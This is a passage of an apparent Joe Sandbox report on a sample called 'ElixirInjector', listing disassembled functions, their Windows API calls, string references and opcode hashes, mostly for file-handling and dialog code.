Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5c4b4dbebcce285bc45cfd00a08c8a51bc2128b0c065b412a239c469edede5f2
Instruction ID: e46abb56a49afd2c0d7e0cd60a8d42b4f5ec4b6a713f9489881b4273cb5c6518
Opcode Fuzzy Hash: 5c4b4dbebcce285bc45cfd00a08c8a51bc2128b0c065b412a239c469edede5f2
Instruction Fuzzy Hash: D7A011C22AA022BC300822A03C03C3B020CC0C2B20332A82EF80AC0080B888082838B2

Function 00F2E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E580

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e83515f7806bd3b95ae3c534837a059aae0e715f9f8d0a98be5652bba5fe0dc8
Instruction ID: e46abb56a49afd2c0d7e0cd60a8d42b4f5ec4b6a713f9489881b4273cb5c6518
Opcode Fuzzy Hash: e83515f7806bd3b95ae3c534837a059aae0e715f9f8d0a98be5652bba5fe0dc8
Instruction Fuzzy Hash: D7A011C22AA022BC300822A03C03C3B020CC0C2B20332A82EF80AC0080B888082838B2

Function 00F2E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E580

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: eb5b764eba29685065e24278ac8fb0bc5f2690a062476e44343f7438612818ab
Instruction ID: 11508de24fad83c6fc3c6f5d26655ea4a2341ab73adbe0feb8765508e5837ef5
Opcode Fuzzy Hash: eb5b764eba29685065e24278ac8fb0bc5f2690a062476e44343f7438612818ab
Instruction Fuzzy Hash: 57A011C22AA0203C300822A03C03C3B0A0CC0C2B22332A22EF808C0080B888082838B2

Function 00F2E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E51F

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c7109fde157cd6e2263abeaa204a9210a3239f9d588ed23c16cdf5955c803e3a
Instruction ID: f1807dabfba8907a8743a24e9c35eed44555ea91e4fcd14e655d997d6ed64126
Opcode Fuzzy Hash: c7109fde157cd6e2263abeaa204a9210a3239f9d588ed23c16cdf5955c803e3a
Instruction Fuzzy Hash: 84A011C22AA022BC300822003C03C3B0A0CC0C2F20332A82EF88AC8080B8800C0038B2

Function 00F2E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E51F

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 34073e398207f7e6e587c97aac2c6b14d0d2348a6694ea1e6a6b444447d64c5f
Instruction ID: f1807dabfba8907a8743a24e9c35eed44555ea91e4fcd14e655d997d6ed64126
Opcode Fuzzy Hash: 34073e398207f7e6e587c97aac2c6b14d0d2348a6694ea1e6a6b444447d64c5f
Instruction Fuzzy Hash: 84A011C22AA022BC300822003C03C3B0A0CC0C2F20332A82EF88AC8080B8800C0038B2

Function 00F2E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E51F

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a83df14480d95b7c0bd18f4461c15eeec532ced7ac9845b3ee3a035d3a0ef280
Instruction ID: f1807dabfba8907a8743a24e9c35eed44555ea91e4fcd14e655d997d6ed64126
Opcode Fuzzy Hash: a83df14480d95b7c0bd18f4461c15eeec532ced7ac9845b3ee3a035d3a0ef280
Instruction Fuzzy Hash: 84A011C22AA022BC300822003C03C3B0A0CC0C2F20332A82EF88AC8080B8800C0038B2

Function 00F2E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E51F

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d9bebe160b314b55e4d7ac5e5fab983f5a085666f95766a49af9c9cefae5c50f
Instruction ID: f1807dabfba8907a8743a24e9c35eed44555ea91e4fcd14e655d997d6ed64126
Opcode Fuzzy Hash: d9bebe160b314b55e4d7ac5e5fab983f5a085666f95766a49af9c9cefae5c50f
Instruction Fuzzy Hash: 84A011C22AA022BC300822003C03C3B0A0CC0C2F20332A82EF88AC8080B8800C0038B2

Function 00F19F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00F1903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00F19F0C

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: af540e02216fa4cc38f82d237aa8bd4fa003d475a3879d1a87789bb812055868
Instruction ID: adbf051fbff43977f66e347da82fe0fdf893ccd7992cc718d8a717c1dab856f5
Opcode Fuzzy Hash: af540e02216fa4cc38f82d237aa8bd4fa003d475a3879d1a87789bb812055868
Instruction Fuzzy Hash: 13A0113808000E8AAE002B30CA0800C3B20EB22BC830002A8A00ACA0A2CB22880BAA00

Function 00F2AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,00F2AE72,C:\Users\user\Desktop,00000000,00F5946A,00000006), ref: 00F2AC08

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: c75b6a858f82d8c75c0343a097215143029f7c848ae726cdc79fcc23690e9724
Instruction ID: 7adee84b03e5e4f5d84d8a2f2e2d675614c4913f6dd5d86a344e57d4ff56a873
Opcode Fuzzy Hash: c75b6a858f82d8c75c0343a097215143029f7c848ae726cdc79fcc23690e9724
Instruction Fuzzy Hash: 44A011302002808BA2000B328F0AA0EBAAAAFA2B00F00C028A80080030CB30C830BA00

Function 00F19620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,00F195D6,?,?,?,?,?,00F42641,000000FF), ref: 00F1963B

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a7772b90fbc0d590582fcafda1ab6c5b41627b6cfd87d07dcd5282071312e75a
Instruction ID: 2b81a9d36f592d99dfb3c98f4cc65690521993b13e46663d93d449d7b1eabafd
Opcode Fuzzy Hash: a7772b90fbc0d590582fcafda1ab6c5b41627b6cfd87d07dcd5282071312e75a
Instruction Fuzzy Hash: F5F08970889B159FDB308A24C8687D277E86B22335F041B1ED4F6439E0D7A165CDAA90

Non-executed Functions

Function 00F2C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F11316: GetDlgItem.USER32(00000000,00003021), ref: 00F1135A
Part of subcall function 00F11316: SetWindowTextW.USER32(00000000,00F435F4), ref: 00F11370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00F2C2B1
EndDialog.USER32(?,00000006), ref: 00F2C2C4
GetDlgItem.USER32(?,0000006C), ref: 00F2C2E0
SetFocus.USER32(00000000), ref: 00F2C2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 00F2C321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00F2C358
FindFirstFileW.KERNEL32(?,?), ref: 00F2C36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F2C38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 00F2C39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00F2C3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00F2C3D4
_swprintf.LIBCMT ref: 00F2C404

Part of subcall function 00F14092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F140A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00F2C417
FindClose.KERNEL32(00000000), ref: 00F2C41E
_swprintf.LIBCMT ref: 00F2C477
SetDlgItemTextW.USER32(?,00000068,?), ref: 00F2C48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00F2C4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00F2C4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00F2C4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00F2C4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00F2C509
_swprintf.LIBCMT ref: 00F2C535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00F2C548
_swprintf.LIBCMT ref: 00F2C59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 00F2C5AF

Part of subcall function 00F2AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00F2AF35
Part of subcall function 00F2AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00F4E72C,?,?), ref: 00F2AF84

Strings

REPLACEFILEDLG, xrefs: 00F2C247
%s %s %s, xrefs: 00F2C3F2, 00F2C527
%s %s, xrefs: 00F2C469, 00F2C58E

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: 7ae73c4dc5f902bc2e0ae5d4e4b477787e6fb260a788dd0d6fefbd7ccd5484ff
Instruction ID: 528f091f413636a5350511eded13d84e7b42215d30167e1371035dc304db7801
Opcode Fuzzy Hash: 7ae73c4dc5f902bc2e0ae5d4e4b477787e6fb260a788dd0d6fefbd7ccd5484ff
Instruction Fuzzy Hash: 5A91A272548358BBD221DBA0DC49FFF77ACEB8A700F444819F689D6081DB75EA04A763

Function 00F16FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F16FAA
_wcslen.LIBCMT ref: 00F17013
_wcslen.LIBCMT ref: 00F17084

Part of subcall function 00F17A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F17AAB
Part of subcall function 00F17A9C: GetLastError.KERNEL32 ref: 00F17AF1
Part of subcall function 00F17A9C: CloseHandle.KERNEL32(?), ref: 00F17B00

Part of subcall function 00F1A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00F1977F,?,?,00F195CF,?,?,?,?,?,00F42641,000000FF), ref: 00F1A1F1
Part of subcall function 00F1A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00F1977F,?,?,00F195CF,?,?,?,?,?,00F42641), ref: 00F1A21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00F17139
CloseHandle.KERNEL32(00000000), ref: 00F17155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00F17298

Part of subcall function 00F19DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00F173BC,?,?,?,00000000), ref: 00F19DBC
Part of subcall function 00F19DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00F19E70

Part of subcall function 00F19620: CloseHandle.KERNELBASE(000000FF,?,?,00F195D6,?,?,?,?,?,00F42641,000000FF), ref: 00F1963B

Part of subcall function 00F1A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00F1A325,?,?,?,00F1A175,?,00000001,00000000,?,?), ref: 00F1A501
Part of subcall function 00F1A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F1A325,?,?,?,00F1A175,?,00000001,00000000,?,?), ref: 00F1A532

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00F16FCC
\??\, xrefs: 00F1702B
SeRestorePrivilege, xrefs: 00F16FC2
UNC\, xrefs: 00F17051

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: 4a2f8cc782fc7a064b688283f3e370e30667b1aaa97b4c320ed65ab724d2ecdf
Instruction ID: 2530b06807d766ca53173b368c5cb3bdc646887792822135cfbec620657f7e1f
Opcode Fuzzy Hash: 4a2f8cc782fc7a064b688283f3e370e30667b1aaa97b4c320ed65ab724d2ecdf
Instruction Fuzzy Hash: 07C1E671D04744AADB25EB74DC41FEEB7B8AF04310F004559F95AE3282D778AA84EB61

Function 00F3D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00F3DA34

Strings

1#QNAN, xrefs: 00F3EC3A
1#SNAN, xrefs: 00F3EC33
1#INF, xrefs: 00F3EC41
1#IND, xrefs: 00F3EC2C

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 3c6fdb9eb1414b22c4e188190ac3d5526beec7df2cc96dc83957012e6e21303b
Instruction ID: becbde364f044276b487e9b0aed0aff9f67365c4e72ab593012f56d3231f06b1
Opcode Fuzzy Hash: 3c6fdb9eb1414b22c4e188190ac3d5526beec7df2cc96dc83957012e6e21303b
Instruction Fuzzy Hash: CAC24D72E046288FDB25CE28DD407EAB7B5EF44364F1541EAD84DE7280E779AE819F40

Function 00F132F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F13300
_swprintf.LIBCMT ref: 00F136C7

Strings

h%u, xrefs: 00F136BC
hc%u, xrefs: 00F1370A
CMT, xrefs: 00F13A17

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: 96d3c35037ecbdbbb4a3392f9f0fe56b08b246af1df3fc1b57f2a87ce59a8dd8
Instruction ID: e20278da38a72e739d06d087dc894f8ba1f646f4088f08a78c03d801d3bf13f1
Opcode Fuzzy Hash: 96d3c35037ecbdbbb4a3392f9f0fe56b08b246af1df3fc1b57f2a87ce59a8dd8
Instruction Fuzzy Hash: EA32E471504384AFDF18DF74C895AE93BA5AF54300F08047DFD8A8B282DB74AA89DB60

Function 00F1286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F12874
_strlen.LIBCMT ref: 00F12E3F

Part of subcall function 00F202BA: __EH_prolog.LIBCMT ref: 00F202BF

Part of subcall function 00F21B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00F1BAE9,00000000,?,?,?,000103D8), ref: 00F21BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F12F91

Strings

CMT, xrefs: 00F12FBC

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: 72f75742b0e7cda930ee7722f6fb94379ecb423155664079652361a568eeb59e
Instruction ID: b4ae980d53506de3051d42f643550d3e42790871dec593bc8992f48a66149094
Opcode Fuzzy Hash: 72f75742b0e7cda930ee7722f6fb94379ecb423155664079652361a568eeb59e
